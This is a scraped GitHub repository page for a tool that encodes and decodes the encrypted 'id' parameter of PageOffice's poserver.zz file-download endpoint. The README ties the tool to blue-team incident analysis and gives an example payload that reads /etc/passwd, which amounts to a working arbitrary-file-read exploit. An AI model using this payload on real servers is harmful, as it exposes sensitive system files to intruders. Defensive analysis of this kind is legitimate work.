PageOffice_FileDownload

分析

某次蓝队防守时发现流量告警，读取了服务器敏感文件。客户要求解密请求字符串，根据页面回显的版本从github找到相应jar进行审计。

根据请求url（poserver.zz?pgop=opendiskdoc&id=）定位到该文件，其中f函数对id参数值进行解密。

跟进f函数能看到是解密过程。

package

javac Main.java
jar -cvmf MANIFEST.MF PageOffice-FileDownload.jar *.class

env

jdk1.8

Usage

1. encode

java -jar PageOffice-FileDownload.jar encode /etc/passwd

encode payload:
poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnLDh2OCQpbSJyK2w4cj9uKzsXbiRqL2EXci9tIi0lYThjOCs5ciZjF2s=

2. decode

java -jar PageOffice-FileDownload.jar decode KmcgY3MtLG0jY2VxJnQjZSYxYjVlcStwOmMmcWVkOXEpbiZtKC58Ln8tOXIXcDhzJCs

decode payload:
file=/etc/passwd&filename=1.txt&contenttype=application/octet-stream

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
MANIFEST.MF		MANIFEST.MF
Main.java		Main.java
PageOffice-FileDownload.jar		PageOffice-FileDownload.jar
README.md		README.md
pageoffice4.5.0.12.jar		pageoffice4.5.0.12.jar

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

PageOffice_FileDownload

分析

package

env

Usage

1. encode

2. decode

About

Uh oh!

Releases

Packages

Languages

JosT4r/PageOffice_FileDownload

Folders and files

Latest commit

History

Repository files navigation

PageOffice_FileDownload

分析

package

env

Usage

1. encode

2. decode

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages